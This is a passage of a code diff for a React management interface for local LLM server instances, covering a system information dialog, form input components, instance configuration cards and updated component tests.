<ChevronRight className="h-4 w-4" />
)}
<HelpCircle className="h-4 w-4" />
Command Line Options
</Button>
{showHelp && (
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --help</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono max-h-64 overflow-y-auto">
{backendInfo.help}
</pre>
</div>
)}
</div>
</div>
)
}
return (
<Dialog open={open} onOpenChange={onOpenChange} >
<Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-4xl max-w-[calc(100%-2rem)] max-h-[80vh] flex flex-col">
<DialogHeader>
<div className="flex items-center justify-between">
<div>
<DialogTitle className="flex items-center gap-2">
<Monitor className="h-5 w-5" />
System Information
</DialogTitle>
<DialogDescription>
Llama.cpp server environment and capabilities
</DialogDescription>
</div>
<Button
variant="outline"
size="sm"
onClick={fetchSystemInfo}
disabled={loading}
>
{loading ? (
<Loader2 className="h-4 w-4 animate-spin" />
) : (
<RefreshCw className="h-4 w-4" />
)}
</Button>
</div>
<DialogTitle className="flex items-center gap-2">
<Monitor className="h-5 w-5" />
System Information
</DialogTitle>
<DialogDescription>
View system and backend-specific environment and capabilities
</DialogDescription>
</DialogHeader>
<div className="flex-1 overflow-y-auto">
{loading && !systemInfo ? (
<div className="flex items-center justify-center py-12">
<Loader2 className="h-6 w-6 animate-spin text-gray-400" />
<span className="ml-2 text-gray-400">Loading system information...</span>
</div>
) : error ? (
<div className="flex items-center gap-2 p-4 bg-destructive/10 border border-destructive/20 rounded-lg">
<AlertCircle className="h-4 w-4 text-destructive" />
<span className="text-sm text-destructive">{error}</span>
</div>
) : systemInfo ? (
<div className="space-y-6">
{/* Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --version</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{systemInfo.version}
</pre>
</div>
<div className="space-y-6">
{/* Llamactl Version Section - Always shown */}
<div className="space-y-3">
<h3 className="font-semibold">Llamactl Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{getAppVersion()}
</pre>
</div>
</div>
{/* Devices Section */}
<div className="space-y-3">
<div className="flex items-center gap-2">
<h3 className="font-semibold">Available Devices</h3>
{/* Backend Selection Section */}
<div className="space-y-3">
<h3 className="font-semibold">Backend Information</h3>
<div className="flex items-center gap-3">
<div className="flex-1">
<SelectInput
id="backend-select"
label=""
value={selectedBackend}
onChange={(value) => handleBackendChange(value || BackendType.LLAMA_CPP)}
options={BACKEND_OPTIONS}
className="text-sm"
/>
</div>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --list-devices</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{systemInfo.devices}
</pre>
</div>
</div>
{/* Help Section */}
<div className="space-y-3">
<Button
variant="ghost"
onClick={() => setShowHelp(!showHelp)}
className="flex items-center gap-2 p-0 h-auto font-semibold"
>
{showHelp ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
<HelpCircle className="h-4 w-4" />
Command Line Options
</Button>
{showHelp && (
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --help</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono max-h-64 overflow-y-auto">
{systemInfo.help}
</pre>
</div>
{selectedBackend === BackendType.LLAMA_CPP && (
<Button
variant="outline"
size="sm"
onClick={() => void fetchBackendInfo(selectedBackend)}
disabled={loading}
>
{loading ? (
<Loader2 className="h-4 w-4 animate-spin" />
) : (
<RefreshCw className="h-4 w-4" />
)}
</Button>
)}
</div>
</div>
) : null}
{/* Backend-specific content */}
{renderBackendSpecificContent()}
</div>
</div>
<DialogFooter>

View File

@@ -3,6 +3,7 @@ import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({
@@ -17,14 +18,14 @@ describe('InstanceCard - Instance Actions and State', () => {
const stoppedInstance: Instance = {
name: 'test-instance',
running: false,
options: { model: 'test-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'test-model.gguf' } }
}
const runningInstance: Instance = {
name: 'running-instance',
running: true,
options: { model: 'running-model.gguf' }
status: 'running',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'running-model.gguf' } }
}
beforeEach(() => {
@@ -101,7 +102,7 @@ afterEach(() => {
it('opens logs dialog when logs button clicked', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={stoppedInstance}
@@ -112,9 +113,13 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const logsButton = screen.getByTitle('View logs')
await user.click(logsButton)
// Should open logs dialog (we can verify this by checking if dialog title appears)
expect(screen.getByText(`Logs: ${stoppedInstance.name}`)).toBeInTheDocument()
})
@@ -124,7 +129,7 @@ afterEach(() => {
it('shows confirmation dialog and calls deleteInstance when confirmed', async () => {
const user = userEvent.setup()
const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true)
render(
<InstanceCard
instance={stoppedInstance}
@@ -135,19 +140,23 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
expect(confirmSpy).toHaveBeenCalledWith('Are you sure you want to delete instance "test-instance"?')
expect(mockDeleteInstance).toHaveBeenCalledWith('test-instance')
confirmSpy.mockRestore()
})
it('does not call deleteInstance when confirmation cancelled', async () => {
const user = userEvent.setup()
const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(false)
render(
<InstanceCard
instance={stoppedInstance}
@@ -158,18 +167,24 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
expect(confirmSpy).toHaveBeenCalled()
expect(mockDeleteInstance).not.toHaveBeenCalled()
confirmSpy.mockRestore()
})
})
describe('Button State Based on Instance Status', () => {
it('disables start button and enables stop button for running instance', () => {
it('disables start button and enables stop button for running instance', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -180,12 +195,19 @@ afterEach(() => {
/>
)
expect(screen.getByTitle('Start instance')).toBeDisabled()
expect(screen.queryByTitle('Start instance')).not.toBeInTheDocument()
expect(screen.getByTitle('Stop instance')).not.toBeDisabled()
// Expand more actions to access delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('Delete instance')).toBeDisabled() // Can't delete running instance
})
it('enables start button and disables stop button for stopped instance', () => {
it('enables start button and disables stop button for stopped instance', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={stoppedInstance}
@@ -197,11 +219,18 @@ afterEach(() => {
)
expect(screen.getByTitle('Start instance')).not.toBeDisabled()
expect(screen.getByTitle('Stop instance')).toBeDisabled()
expect(screen.queryByTitle('Stop instance')).not.toBeInTheDocument()
// Expand more actions to access delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('Delete instance')).not.toBeDisabled() // Can delete stopped instance
})
it('edit and logs buttons are always enabled', () => {
it('edit and logs buttons are always enabled', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -213,6 +242,11 @@ afterEach(() => {
)
expect(screen.getByTitle('Edit instance')).not.toBeDisabled()
// Expand more actions to access logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('View logs')).not.toBeDisabled()
})
})
@@ -267,7 +301,7 @@ afterEach(() => {
describe('Integration with LogsModal', () => {
it('passes correct props to LogsModal', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -278,20 +312,24 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
// Open logs dialog
await user.click(screen.getByTitle('View logs'))
// Verify dialog opened with correct instance data
expect(screen.getByText('Logs: running-instance')).toBeInTheDocument()
// Close dialog to test close functionality
const closeButtons = screen.getAllByText('Close')
const dialogCloseButton = closeButtons.find(button =>
const dialogCloseButton = closeButtons.find(button =>
button.closest('[data-slot="dialog-content"]')
)
expect(dialogCloseButton).toBeTruthy()
await user.click(dialogCloseButton!)
// Modal should close
expect(screen.queryByText('Logs: running-instance')).not.toBeInTheDocument()
})
@@ -301,7 +339,7 @@ afterEach(() => {
it('handles instance with minimal data', () => {
const minimalInstance: Instance = {
name: 'minimal',
running: false,
status: 'stopped',
options: {}
}
@@ -323,7 +361,7 @@ afterEach(() => {
it('handles instance with undefined options', () => {
const instanceWithoutOptions: Instance = {
name: 'no-options',
running: true,
status: 'running',
options: undefined
}

View File

@@ -5,6 +5,7 @@ import InstanceList from '@/components/InstanceList'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -44,9 +45,9 @@ describe('InstanceList - State Management and UI Logic', () => {
const mockEditInstance = vi.fn()
const mockInstances: Instance[] = [
{ name: 'instance-1', running: false, options: { model: 'model1.gguf' } },
{ name: 'instance-2', running: true, options: { model: 'model2.gguf' } },
{ name: 'instance-3', running: false, options: { model: 'model3.gguf' } }
{ name: 'instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } },
{ name: 'instance-3', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model3.gguf' } } }
]
const DUMMY_API_KEY = 'test-api-key-123'

View File

@@ -3,6 +3,7 @@ import { render, screen, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceDialog from '@/components/InstanceDialog'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
describe('InstanceModal - Form Logic and Validation', () => {
const mockOnSave = vi.fn()
@@ -91,6 +92,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
})
})
@@ -134,10 +136,10 @@ afterEach(() => {
describe('Edit Mode', () => {
const mockInstance: Instance = {
name: 'existing-instance',
running: false,
status: 'stopped',
options: {
model: 'test-model.gguf',
gpu_layers: 10,
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
}
}
@@ -177,15 +179,15 @@ afterEach(() => {
await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
model: 'test-model.gguf',
gpu_layers: 10,
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
})
})
it('shows correct button text for running vs stopped instances', () => {
const runningInstance: Instance = { ...mockInstance, running: true }
const runningInstance: Instance = { ...mockInstance, status: 'running' }
const { rerender } = render(
<InstanceDialog
open={true}
@@ -271,35 +273,13 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
auto_restart: true,
backend_type: BackendType.LLAMA_CPP,
max_restarts: 5,
restart_delay: 10
})
})
})
describe('Advanced Fields Toggle', () => {
it('shows advanced fields when toggle clicked', async () => {
const user = userEvent.setup()
render(
<InstanceDialog
open={true}
onOpenChange={mockOnOpenChange}
onSave={mockOnSave}
/>
)
// Advanced fields should be hidden initially
expect(screen.queryByText(/Advanced Configuration/)).toBeInTheDocument()
// Click to expand
await user.click(screen.getByText(/Advanced Configuration/))
// Should show more configuration options
// Note: Specific fields depend on zodFormUtils configuration
// We're testing the toggle behavior, not specific fields
})
})
describe('Form Data Handling', () => {
it('cleans up undefined values before submission', async () => {
@@ -321,6 +301,7 @@ afterEach(() => {
// Should only include non-empty values
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
auto_restart: true, // Only this default value should be included
backend_type: BackendType.LLAMA_CPP
})
})
@@ -345,7 +326,8 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
auto_restart: true,
gpu_layers: 15, // Should be number, not string
backend_type: BackendType.LLAMA_CPP,
backend_options: { gpu_layers: 15 }, // Should be number, not string
})
})
})

View File

@@ -0,0 +1,62 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface ArrayInputProps {
id: string
label: string
value: string[] | undefined
onChange: (value: string[] | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const ArrayInput: React.FC<ArrayInputProps> = ({
id,
label,
value,
onChange,
placeholder = "item1, item2, item3",
description,
disabled = false,
className
}) => {
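// An empty input maps to undefined so callers can drop the option; otherwise the string is split on commas and each entry trimmed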
const handleChange = (inputValue: string) => {
if (inputValue === '') {
onChange(undefined)
return
}
const arrayValue = inputValue
.split(',')
.map(s => s.trim())
.filter(Boolean)
onChange(arrayValue.length > 0 ? arrayValue : undefined)
}
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="text"
value={Array.isArray(value) ? value.join(', ') : ''}
onChange={(e) => handleChange(e.target.value)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
<p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
</div>
)
}
export default ArrayInput

View File

@@ -0,0 +1,42 @@
import React from 'react'
import { Checkbox } from '@/components/ui/checkbox'
import { Label } from '@/components/ui/label'
interface CheckboxInputProps {
id: string
label: string
value: boolean | undefined
onChange: (value: boolean) => void
description?: string
disabled?: boolean
className?: string
}
const CheckboxInput: React.FC<CheckboxInputProps> = ({
id,
label,
value,
onChange,
description,
disabled = false,
className
}) => {
return (
<div className={`flex items-center space-x-2 ${className || ''}`}>
<Checkbox
id={id}
checked={value === true}
onCheckedChange={(checked) => onChange(!!checked)}
disabled={disabled}
/>
<Label htmlFor={id} className="text-sm font-normal">
{label}
{description && (
<span className="text-muted-foreground ml-1">- {description}</span>
)}
</Label>
</div>
)
}
export default CheckboxInput

View File

@@ -0,0 +1,144 @@
import React, { useState } from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Button } from '@/components/ui/button'
import { X, Plus } from 'lucide-react'
interface EnvironmentVariablesInputProps {
id: string
label: string
value: Record<string, string> | undefined
onChange: (value: Record<string, string> | undefined) => void
description?: string
disabled?: boolean
className?: string
}
interface EnvVar {
key: string
value: string
}
const EnvironmentVariablesInput: React.FC<EnvironmentVariablesInputProps> = ({
id,
label,
value,
onChange,
description,
disabled = false,
className
}) => {
// Convert the value object to an array of key-value pairs for editing
const envVarsFromValue = value
? Object.entries(value).map(([key, val]) => ({ key, value: val }))
: []
const [envVars, setEnvVars] = useState<EnvVar[]>(
envVarsFromValue.length > 0 ? envVarsFromValue : [{ key: '', value: '' }]
)
// Update parent component when env vars change
const updateParent = (newEnvVars: EnvVar[]) => {
// Filter out empty entries
const validVars = newEnvVars.filter(env => env.key.trim() !== '' && env.value.trim() !== '')
if (validVars.length === 0) {
onChange(undefined)
} else {
const envObject = validVars.reduce((acc, env) => {
acc[env.key.trim()] = env.value.trim()
return acc
}, {} as Record<string, string>)
onChange(envObject)
}
}
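// Example of the round trip (hypothetical variable names): rows
//   [{ key: 'CUDA_VISIBLE_DEVICES', value: '0' }, { key: '', value: '' }]
// collapse to { CUDA_VISIBLE_DEVICES: '0' }, while an editor with only empty rows reports undefined
// so the environment option can be dropped from the request payload.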
const handleKeyChange = (index: number, newKey: string) => {
// Update the row immutably so the previous state array and its objects are never mutated in place
const newEnvVars = envVars.map((env, i) => (i === index ? { ...env, key: newKey } : env))
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
const handleValueChange = (index: number, newValue: string) => {
const newEnvVars = envVars.map((env, i) => (i === index ? { ...env, value: newValue } : env))
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
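// Adding a row only touches local state; the parent is notified once the new row has both a key and a value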
const addEnvVar = () => {
const newEnvVars = [...envVars, { key: '', value: '' }]
setEnvVars(newEnvVars)
}
const removeEnvVar = (index: number) => {
if (envVars.length === 1) {
// Reset to empty if it's the last one
const newEnvVars = [{ key: '', value: '' }]
setEnvVars(newEnvVars)
updateParent(newEnvVars)
} else {
const newEnvVars = envVars.filter((_, i) => i !== index)
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
}
return (
<div className={`grid gap-2 ${className || ''}`}>
<Label htmlFor={id}>
{label}
</Label>
<div className="space-y-2">
{envVars.map((envVar, index) => (
<div key={index} className="flex gap-2 items-center">
<Input
placeholder="Variable name"
value={envVar.key}
onChange={(e) => handleKeyChange(index, e.target.value)}
disabled={disabled}
className="flex-1"
/>
<Input
placeholder="Variable value"
value={envVar.value}
onChange={(e) => handleValueChange(index, e.target.value)}
disabled={disabled}
className="flex-1"
/>
<Button
type="button"
variant="outline"
size="sm"
onClick={() => removeEnvVar(index)}
disabled={disabled}
className="shrink-0"
>
<X className="h-4 w-4" />
</Button>
</div>
))}
<Button
type="button"
variant="outline"
size="sm"
onClick={addEnvVar}
disabled={disabled}
className="w-fit"
>
<Plus className="h-4 w-4 mr-2" />
Add Variable
</Button>
</div>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
<p className="text-xs text-muted-foreground">
Environment variables that will be passed to the backend process
</p>
</div>
)
}
export default EnvironmentVariablesInput

View File

@@ -0,0 +1,60 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface NumberInputProps {
id: string
label: string
value: number | undefined
onChange: (value: number | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const NumberInput: React.FC<NumberInputProps> = ({
id,
label,
value,
onChange,
placeholder,
description,
disabled = false,
className
}) => {
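// Clearing the field reports undefined; input that does not parse as a number is ignored rather than propagated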
const handleChange = (inputValue: string) => {
if (inputValue === '') {
onChange(undefined)
return
}
const numValue = parseFloat(inputValue)
if (!isNaN(numValue)) {
onChange(numValue)
}
}
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="number"
step="any"
value={value !== undefined ? value : ''}
onChange={(e) => handleChange(e.target.value)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default NumberInput

View File

@@ -0,0 +1,55 @@
import React from 'react'
import { Label } from '@/components/ui/label'
interface SelectOption {
value: string
label: string
}
interface SelectInputProps {
id: string
label: string
value: string | undefined
onChange: (value: string | undefined) => void
options: SelectOption[]
description?: string
disabled?: boolean
className?: string
}
const SelectInput: React.FC<SelectInputProps> = ({
id,
label,
value,
onChange,
options,
description,
disabled = false,
className
}) => {
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<select
id={id}
value={value || ''}
onChange={(e) => onChange(e.target.value || undefined)}
disabled={disabled}
className={`flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50 ${className || ''}`}
>
{options.map(option => (
<option key={option.value} value={option.value}>
{option.label}
</option>
))}
</select>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default SelectInput

View File

@@ -0,0 +1,47 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface TextInputProps {
id: string
label: string
value: string | number | undefined
onChange: (value: string | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const TextInput: React.FC<TextInputProps> = ({
id,
label,
value,
onChange,
placeholder,
description,
disabled = false,
className
}) => {
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="text"
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => onChange(e.target.value || undefined)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default TextInput

View File

@@ -0,0 +1,53 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import CheckboxInput from '@/components/form/CheckboxInput'
import NumberInput from '@/components/form/NumberInput'
interface AutoRestartConfigurationProps {
formData: CreateInstanceOptions
onChange: (key: keyof CreateInstanceOptions, value: any) => void
}
const AutoRestartConfiguration: React.FC<AutoRestartConfigurationProps> = ({
formData,
onChange
}) => {
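// Max restarts and restart delay only apply when auto restart is enabled, so they are rendered only while the checkbox is checked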
const isAutoRestartEnabled = formData.auto_restart === true
return (
<div className="space-y-4">
<h3 className="text-lg font-medium">Auto Restart Configuration</h3>
<CheckboxInput
id="auto_restart"
label="Auto Restart"
value={formData.auto_restart}
onChange={(value) => onChange('auto_restart', value)}
description="Automatically restart the instance on failure"
/>
{isAutoRestartEnabled && (
<div className="ml-6 space-y-4 border-l-2 border-muted pl-4">
<NumberInput
id="max_restarts"
label="Max Restarts"
value={formData.max_restarts}
onChange={(value) => onChange('max_restarts', value)}
placeholder="3"
description="Maximum number of restart attempts (0 = unlimited)"
/>
<NumberInput
id="restart_delay"
label="Restart Delay (seconds)"
value={formData.restart_delay}
onChange={(value) => onChange('restart_delay', value)}
placeholder="5"
description="Delay in seconds before attempting restart"
/>
</div>
)}
</div>
)
}
export default AutoRestartConfiguration

View File

@@ -0,0 +1,54 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import { getBasicBackendFields, getAdvancedBackendFields } from '@/lib/zodFormUtils'
import BackendFormField from '@/components/BackendFormField'
interface BackendConfigurationProps {
formData: CreateInstanceOptions
onBackendFieldChange: (key: string, value: any) => void
showAdvanced?: boolean
}
const BackendConfiguration: React.FC<BackendConfigurationProps> = ({
formData,
onBackendFieldChange,
showAdvanced = false
}) => {
const basicBackendFields = getBasicBackendFields(formData.backend_type)
const advancedBackendFields = getAdvancedBackendFields(formData.backend_type)
return (
<div className="space-y-4">
<h3 className="text-lg font-medium">Backend Configuration</h3>
{/* Basic backend fields */}
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as any)?.[fieldKey]}
onChange={onBackendFieldChange}
/>
))}
{/* Advanced backend fields */}
{showAdvanced && advancedBackendFields.length > 0 && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
<h4 className="text-md font-medium">Advanced Backend Configuration</h4>
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as any)?.[fieldKey]}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
</div>
)
}
export default BackendConfiguration

View File

@@ -0,0 +1,117 @@
import React, { useState } from 'react'
import { BackendType, type CreateInstanceOptions } from '@/types/instance'
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
import { Button } from '@/components/ui/button'
import { Terminal, ChevronDown, ChevronRight } from 'lucide-react'
import { getBasicBackendFields, getAdvancedBackendFields } from '@/lib/zodFormUtils'
import BackendFormField from '@/components/BackendFormField'
import SelectInput from '@/components/form/SelectInput'
interface BackendConfigurationCardProps {
formData: CreateInstanceOptions
onBackendFieldChange: (key: string, value: unknown) => void
onChange: (key: keyof CreateInstanceOptions, value: unknown) => void
onParseCommand: () => void
}
const BackendConfigurationCard: React.FC<BackendConfigurationCardProps> = ({
formData,
onBackendFieldChange,
onChange,
onParseCommand
}) => {
const [showAdvanced, setShowAdvanced] = useState(false)
const basicBackendFields = getBasicBackendFields(formData.backend_type)
const advancedBackendFields = getAdvancedBackendFields(formData.backend_type)
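// Field lists come from zodFormUtils: "basic" is the curated per-backend subset, "advanced" is every other key in that backend's Zod schema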
return (
<Card>
<CardHeader>
<CardTitle>Backend Configuration</CardTitle>
</CardHeader>
<CardContent className="space-y-6">
{/* Backend Type Selection */}
<SelectInput
id="backend_type"
label="Backend Type"
value={formData.backend_type || BackendType.LLAMA_CPP}
onChange={(value) => onChange('backend_type', value)}
options={[
{ value: BackendType.LLAMA_CPP, label: 'Llama Server' },
{ value: BackendType.MLX_LM, label: 'MLX LM' },
{ value: BackendType.VLLM, label: 'vLLM' }
]}
description="Select the backend server type"
/>
{/* Parse Command Section */}
<div className="flex flex-col gap-2">
<Button
variant="outline"
onClick={onParseCommand}
className="flex items-center gap-2 w-fit"
>
<Terminal className="h-4 w-4" />
Parse Command
</Button>
<p className="text-sm text-muted-foreground">
Import settings from your backend command
</p>
</div>
{/* Basic Backend Options */}
{basicBackendFields.length > 0 && (
<div className="space-y-4">
<h3 className="text-md font-medium">Basic Backend Options</h3>
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as Record<string, unknown>)?.[fieldKey] as string | number | boolean | string[] | undefined}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
{/* Advanced Backend Options */}
{advancedBackendFields.length > 0 && (
<div className="space-y-4">
<Button
variant="ghost"
onClick={() => setShowAdvanced(!showAdvanced)}
className="flex items-center gap-2 p-0 h-auto font-medium"
>
{showAdvanced ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
Advanced Backend Options
<span className="text-muted-foreground text-sm font-normal">
({advancedBackendFields.length} options)
</span>
</Button>
{showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as Record<string, unknown>)?.[fieldKey] as string | number | boolean | string[] | undefined}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
</div>
)}
</CardContent>
</Card>
)
}
export default BackendConfigurationCard

View File

@@ -0,0 +1,93 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
import { Label } from '@/components/ui/label'
import { Input } from '@/components/ui/input'
import AutoRestartConfiguration from '@/components/instance/AutoRestartConfiguration'
import NumberInput from '@/components/form/NumberInput'
import CheckboxInput from '@/components/form/CheckboxInput'
import EnvironmentVariablesInput from '@/components/form/EnvironmentVariablesInput'
interface InstanceSettingsCardProps {
instanceName: string
nameError: string
isEditing: boolean
formData: CreateInstanceOptions
onNameChange: (name: string) => void
onChange: (key: keyof CreateInstanceOptions, value: unknown) => void
}
const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
instanceName,
nameError,
isEditing,
formData,
onNameChange,
onChange
}) => {
return (
<Card>
<CardHeader>
<CardTitle>Instance Settings</CardTitle>
</CardHeader>
<CardContent className="space-y-6">
{/* Instance Name */}
<div className="grid gap-2">
<Label htmlFor="name">
Instance Name <span className="text-red-500">*</span>
</Label>
<Input
id="name"
value={instanceName}
onChange={(e) => onNameChange(e.target.value)}
placeholder="my-instance"
disabled={isEditing}
className={nameError ? "border-red-500" : ""}
/>
{nameError && <p className="text-sm text-red-500">{nameError}</p>}
<p className="text-sm text-muted-foreground">
Unique identifier for the instance
</p>
</div>
{/* Auto Restart Configuration */}
<AutoRestartConfiguration
formData={formData}
onChange={onChange}
/>
{/* Basic Instance Options */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Basic Instance Options</h3>
<NumberInput
id="idle_timeout"
label="Idle Timeout (minutes)"
value={formData.idle_timeout}
onChange={(value) => onChange('idle_timeout', value)}
placeholder="30"
description="Minutes before stopping an idle instance"
/>
<CheckboxInput
id="on_demand_start"
label="On Demand Start"
value={formData.on_demand_start}
onChange={(value) => onChange('on_demand_start', value)}
description="Start instance only when needed"
/>
<EnvironmentVariablesInput
id="environment"
label="Environment Variables"
value={formData.environment}
onChange={(value) => onChange('environment', value)}
description="Custom environment variables for the instance"
/>
</div>
</CardContent>
</Card>
)
}
export default InstanceSettingsCard

View File

@@ -112,9 +112,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.start(name)
// Update only this instance's running status
updateInstanceInMap(name, { running: true })
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to start instance')
}
@@ -124,9 +124,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.stop(name)
// Update only this instance's running status
updateInstanceInMap(name, { running: false })
// Update only this instance's status
updateInstanceInMap(name, { status: "stopped" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to stop instance')
}
@@ -136,9 +136,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.restart(name)
// Update only this instance's running status
updateInstanceInMap(name, { running: true })
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to restart instance')
}

View File

@@ -0,0 +1,54 @@
import { createContext, useContext, useEffect, useState, type ReactNode } from "react";
type Theme = "light" | "dark";
interface ThemeContextType {
